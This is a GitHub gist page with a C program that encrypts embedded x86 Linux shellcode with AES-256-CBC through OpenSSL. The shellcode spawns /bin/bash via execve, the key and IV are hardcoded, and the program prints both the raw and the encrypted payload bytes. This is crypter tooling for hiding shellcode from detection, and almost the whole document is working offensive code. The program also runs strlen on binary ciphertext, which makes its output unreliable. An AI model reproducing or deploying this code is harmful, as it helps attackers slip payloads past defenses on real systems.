Last active
October 2, 2024 21:07
-
-
Save ahpaleus/d0c1b4395394b7e5712d31458fbaad1f to your computer and use it in GitHub Desktop.
AES 256 bit shellcode encryption
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <openssl/conf.h> | |
#include <openssl/evp.h> | |
#include <openssl/err.h> | |
#include <string.h> | |
int main (void) | |
{ | |
/* A 256 bit key */ | |
unsigned char *key = (unsigned char *)"01234567890123456789012345678901"; | |
/* A 128 bit IV */ | |
unsigned char *iv = (unsigned char *)"0123456789012345"; | |
/* Message to be encrypted */ | |
unsigned char *plaintext = | |
(unsigned char *)"\x31\xc9\xf7\xe1\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"; | |
/* Printing original Shellcode */ | |
printf("Our Original shellcode is:\n"); | |
for(int i = 0; i < strlen(plaintext); i++) { | |
printf("\\x%02x", plaintext[i]); | |
} | |
printf("\n------\n"); | |
/* Buffer for ciphertext */ | |
unsigned char ciphertext[128]; | |
/* Buffer for the decrypted text */ | |
unsigned char decryptedtext[128]; | |
int decryptedtext_len, ciphertext_len; | |
/* Encrypt the plaintext */ | |
ciphertext_len = encrypt (plaintext, strlen ((char *)plaintext), key, iv, | |
ciphertext); | |
/* Dump of ciphertext here */ | |
printf("Ciphertext is:\n"); | |
BIO_dump_fp (stdout, (const char *)ciphertext, ciphertext_len); | |
/* Null terminate for printing */ | |
ciphertext[ciphertext_len] = '\0'; | |
printf("\n------\n"); | |
printf("Our encrypted shellcode is:\n"); | |
for(int i = 0; i < strlen(ciphertext); i++) { | |
printf("\\x%02x", ciphertext[i]); | |
} | |
printf("\n------\n"); | |
} | |
void handleErrors(void) | |
{ | |
ERR_print_errors_fp(stderr); | |
abort(); | |
} | |
int encrypt(unsigned char *plaintext, int plaintext_len, unsigned char *key, | |
unsigned char *iv, unsigned char *ciphertext) | |
{ | |
EVP_CIPHER_CTX *ctx; | |
int len; | |
int ciphertext_len; | |
/* Create and initialise the context */ | |
if(!(ctx = EVP_CIPHER_CTX_new())) handleErrors(); | |
/* Initialise the encryption operation. IMPORTANT - ensure you use a key | |
* and IV size appropriate for your cipher | |
* In this example we are using 256 bit AES (i.e. a 256 bit key). The | |
* IV size for *most* modes is the same as the block size. For AES this | |
* is 128 bits */ | |
if(1 != EVP_EncryptInit_ex(ctx, EVP_aes_256_cbc(), NULL, key, iv)) | |
handleErrors(); | |
/* Provide the message to be encrypted, and obtain the encrypted output. | |
* EVP_EncryptUpdate can be called multiple times if necessary | |
*/ | |
if(1 != EVP_EncryptUpdate(ctx, ciphertext, &len, plaintext, plaintext_len)) | |
handleErrors(); | |
ciphertext_len = len; | |
/* Finalise the encryption. Further ciphertext bytes may be written at | |
* this stage. | |
*/ | |
if(1 != EVP_EncryptFinal_ex(ctx, ciphertext + len, &len)) handleErrors(); | |
ciphertext_len += len; | |
/* Clean up */ | |
EVP_CIPHER_CTX_free(ctx); | |
return ciphertext_len; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment